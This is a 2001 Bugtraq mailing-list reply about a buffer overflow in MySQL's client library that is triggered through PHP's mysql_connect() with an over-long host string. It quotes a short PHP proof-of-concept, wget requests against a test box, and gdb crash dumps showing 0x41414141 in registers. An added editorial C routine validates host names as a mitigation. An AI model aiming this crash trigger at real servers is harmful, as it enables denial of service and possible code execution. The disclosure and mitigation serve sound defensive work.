Bugtraq mailing list archives
Re: Some more MySql security issues
From: "Hector A.Paterno" <apmailing () FIBERTEL COM AR>
Date: Mon, 12 Feb 2001 17:20:00 -0300
On Monday 12 February 2001 18:22, you wrote:
> ----- Original Message -----
> From: "Joao Gouveia" <tharbad () KAOTIK ORG>
> To: <BUGTRAQ () SECURITYFOCUS COM>
> Sent: Friday, February 09, 2001 9:54 PM
> Subject: Some more MySql security issues
>
> Hi,
>
> MySql staff has been notified regarding these issues on 2001-01-26.
> There still are some potential security flaws with MySql's latest stable release.
>
> Follows some tests I've made, all with:
>
> MySql v3.23.32
> PHP v4.0.4pl1 (static)
> apache-1.3.14
>
> Let's look at a practical example. A simple php script:
>
> <?
> /* $buffer is taken from the query string; build a host name of $buffer 'A' bytes */
> for ( $i=0 ; $i<= $buffer-1 ; ++$i ) $host.="A";
> $cid = mysql_connect($host,$usr,$pwd);
> ?>
>
> Let's run apache ( latest version compiled with latest version of PHP ) in debugging mode to see what happens:
>
> <quote>
> spike:~ # gdb /www/bin/httpd
> ...
> (gdb) run -X
> Starting program: /www/bin/httpd -X
> </quote>
>
> On our browser we issue:
>
> test.php?buffer=120
>
> gdb shows the following
>
> <quote>
> Program received signal SIGSEGV, Segmentation fault.
> 0x40030cf3 in mysql_real_connect () from /home/jroberto/httpd/mysql/lib/mysql/libmysqlclient.so.10
> (gdb) bt
> #0  0x40030cf3 in mysql_real_connect () from /home/jroberto/httpd/mysql/lib/mysql/libmysqlclient.so.10
> #1  0x41414141 in ?? ()
> (gdb) inf reg
> eax            0x82010c0     136319168
> ecx            0x3           3
> edx            0x82010f4     136319220
> ebx            0x40046324    1074029348
> esp            0xbfffdc30    0xbfffdc30
> ebp            0xbfffdfbc    0xbfffdfbc
> esi            0x8204ba5     136334245
> edi            0x41414141    1094795585
> eip            0x40030cf3    0x40030cf3
> eflags         0x10203       66051
> cs             0x23          35
> ss             0x2b          43
> ds             0x2b          43
> es             0x2b          43
> fs             0x0           0
> gs             0x0           0
> (gdb)
> </quote>
Let's try this problem:

Scenario: Debian Woody.
mysql Ver 11.11 Distrib Mysql 3.23.31
Apache 1.3.14
php 4.0.4pl1

StuffBox:/usr/sbin# gdb apache
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you a
welcome to change it and/or distribute copies of it under certain conditio
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)...
(gdb) run -X
Starting program: /usr/sbin/apache -X
[..]

On the other machine I wrote this script:

<?
for ( $i=0 ; $i<= $buffer-1 ; ++$i ) $host.="A";
$cid = mysql_connect($host,$usr,$pwd);
?>

and uploaded it to my public_html on StuffBox (the box that is running apache + mysql + php), and tested some buffer lengths from another site:

200:

PlayBox:~# wget http://192.168.1.2/~dn/bof.php3?buffer=200

StuffBox:

Program received signal SIGSEGV, Segmentation fault.
0x40182e9d in inet_aton () from /lib/libc.so.6
(gdb) bt
#0  0x40182e9d in inet_aton () from /lib/libc.so.6
#1  0x40182e52 in inet_addr () from /lib/libc.so.6
#2  0x4026a48f in mysql_real_connect () from /usr/lib/libmysqlclient.so.10
(gdb) inf reg
eax            0x401ba160    1075552608
ecx            0x0           0
edx            0x2           2
ebx            0x401b9474    1075549300
esp            0xbfffe27c    0xbfffe27c
ebp            0xbfffe2b4    0xbfffe2b4
esi            0x61697620    1634301472
edi            0x6           6
eip            0x40182e9d    0x40182e9d

500:

PlayBox:~# wget http://192.168.1.2/~dn/bof.php3?buffer=500

Program received signal SIGSEGV, Segmentation fault.
0x40182e9d in inet_aton () from /lib/libc.so.6
(gdb) bt
#0  0x40182e9d in inet_aton () from /lib/libc.so.6
#1  0x40182e52 in inet_addr () from /lib/libc.so.6
#2  0x4026a48f in mysql_real_connect () from /usr/lib/libmysqlclient.so.10
(gdb) inf reg
eax            0x401ba160    1075552608
ecx            0x0           0
edx            0x2           2
ebx            0x401b9474    1075549300
esp            0xbfffe27c    0xbfffe27c
ebp            0xbfffe2b4    0xbfffe2b4
esi            0x41414141    1094795585   <<=
edi            0x6           6
eip            0x40182e9d    0x40182e9d

Cya.
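Both posts above hand a host string of attacker-chosen length straight to mysql_connect(), and the crashes show 0x41414141 landing in EDI, ESI and a backtrace frame. The thread does not identify where inside libmysqlclient the overwrite happens, and nothing below claims to; the point of this added example (editor's code, not from the thread, from MySQL or from PHP) is the application-side check that should sit in front of the library call regardless of how the library is later fixed: bound and validate the host string before it reaches the client. The limits used are the DNS ones (labels of at most 63 octets, names of at most 253 characters in dotted text form, labels of letters, digits and hyphens that do not start or end with a hyphen); the function names, the IPv4-only policy and the probe lengths are assumptions chosen here, and the canonical-dotted-quad rule is deliberately stricter than inet_aton(), which also accepts shorthand and hex forms.

```c
/* Added example: validate a user-influenced database host string before it is
 * passed to a client library such as mysql_real_connect().  Hypothetical
 * helper names; limits follow RFC 1035/1123 (assumption: the application only
 * needs hostnames and IPv4 literals). */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOST_MAX_LEN  253   /* longest dotted text-form DNS name */
#define LABEL_MAX_LEN 63    /* longest single DNS label */

/* 1 if s is a canonical IPv4 dotted quad (four decimal octets 0..255), else 0.
 * Shorthand forms that inet_aton() tolerates ("1.2.3", "0x7f.1") are rejected. */
static int is_dotted_quad(const char *s)
{
    int octets = 0;
    while (*s) {
        int digits = 0, val = 0;
        while (isdigit((unsigned char)*s)) {
            val = val * 10 + (*s - '0');
            if (++digits > 3 || val > 255)
                return 0;
            s++;
        }
        if (digits == 0)
            return 0;                 /* empty octet or non-digit character */
        octets++;
        if (*s == '.') {
            s++;
            if (*s == '\0')
                return 0;             /* trailing dot */
        } else if (*s != '\0') {
            return 0;
        }
    }
    return octets == 4;
}

/* 1 if host is an acceptable hostname or IPv4 literal, 0 otherwise.
 * Rejects NULL, empty, over-long, and any label that is empty, over-long,
 * contains characters outside [A-Za-z0-9-], or starts/ends with '-'. */
int valid_db_host(const char *host)
{
    if (host == NULL)
        return 0;
    size_t n = strlen(host);
    if (n == 0 || n > HOST_MAX_LEN)
        return 0;

    /* Anything made only of digits and dots must be a real dotted quad. */
    int numeric = 1;
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)host[i]) && host[i] != '.')
            numeric = 0;
    if (numeric)
        return is_dotted_quad(host);

    size_t label = 0;
    for (size_t i = 0; i < n; i++) {
        char c = host[i];
        if (c == '.') {
            if (label == 0 || host[i - 1] == '-')
                return 0;             /* empty label or label ending in '-' */
            label = 0;
        } else if (isalnum((unsigned char)c) || c == '-') {
            if (c == '-' && label == 0)
                return 0;             /* label starting with '-' */
            if (++label > LABEL_MAX_LEN)
                return 0;
        } else {
            return 0;                 /* '_', '/', ':', whitespace, ... */
        }
    }
    return label != 0 && host[n - 1] != '-';   /* no trailing '.' or '-' */
}

/* Build the same probe the thread's PHP script builds (n bytes of 'A') and
 * report whether the check stops it before the client library ever sees it.
 * Returns 1 if rejected, 0 if it would be passed on, -1 on allocation failure. */
int probe_is_rejected(size_t n)
{
    char *buf = malloc(n + 1);
    if (buf == NULL)
        return -1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    int rejected = !valid_db_host(buf);
    free(buf);
    return rejected;
}

int main(void)
{
    /* Constructed probe lengths: one legal label, one just over, and the
     * three lengths used in the thread (120, 200, 500). */
    const size_t lengths[] = { 63, 64, 120, 200, 500 };
    for (size_t i = 0; i < sizeof lengths / sizeof lengths[0]; i++)
        printf("buffer=%zu: %s\n", lengths[i],
               probe_is_rejected(lengths[i]) ? "rejected" : "passed to client library");
    return 0;
}
```

A 63-byte run of 'A' is a legal single label and is passed through; 64 bytes and up are refused on label length, and 254 bytes and up on total length, so none of the lengths used in the thread would reach mysql_connect() through this check. The check is a mitigation at the caller, not a fix for whatever is wrong in the client library; it also does nothing about $buffer itself being attacker-controlled, which is a separate matter of not taking connection parameters from the request at all.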
Current thread:
- Some more MySql security issues Joao Gouveia (Feb 10)
- Re: Some more MySql security issues Konrad Rieck (Feb 12)
- Re: Some more MySql security issues Tim Yardley (Feb 12)
- Re: Some more MySql security issues Konrad Rieck (Feb 12)
- Re: Some more MySql security issues Joao Gouveia (Feb 13)
- Re: Some more MySql security issues Tim Yardley (Feb 13)
- Re: Some more MySql security issues Tim Yardley (Feb 12)
- Re: Some more MySql security issues Peter van Dijk (Feb 12)
- Re: Some more MySql security issues Carsten H. Pedersen (Feb 12)
- Re: Some more MySql security issues Konrad Rieck (Feb 12)
- Re: Some more MySql security issues Theodor Milkov (Feb 12)
- <Possible follow-ups>
- Re: Some more MySql security issues Hector A.Paterno (Feb 13)